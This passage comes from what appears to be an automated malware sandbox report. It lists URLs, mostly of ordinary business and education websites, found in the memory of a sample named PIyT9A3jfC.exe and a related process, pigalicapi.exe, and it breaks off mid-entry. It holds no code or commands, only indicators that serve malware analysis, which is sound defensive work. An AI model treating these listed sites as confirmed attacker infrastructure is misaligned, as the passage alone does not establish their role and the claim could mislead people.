https://www.com-sit.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.com-sit.com%2F&#038;format=xm
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076C3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.777742716.00000000076C3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-json/wp/v2/pages/46
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/x-ray/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/xmlrpc.php?rsd
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/zertifikate/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.crcsi.org/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702274857.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.704904203.00000000060C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.704473674.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.588219814.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.credo.edu.pl/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.credo.edu.pl/(
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592100906.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.edimart.hu/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#/schema/logo/image/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#breadcrumb
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#organization
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#primaryimage
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/#website
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/?s=
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/avtorji/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/category/aktualno/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/disclaimer/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/elpro-laboratorij-za-kalibracije/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/en/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/el-pro-set4/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/o320-3003-180-500-m-temperaturno-tipalo-termoelement-tc-oplascen-s-prik
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/ttu-gla-010-11a3l-160-30559-twrsb-0-0-ptfe-temperaturno-tipalo/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 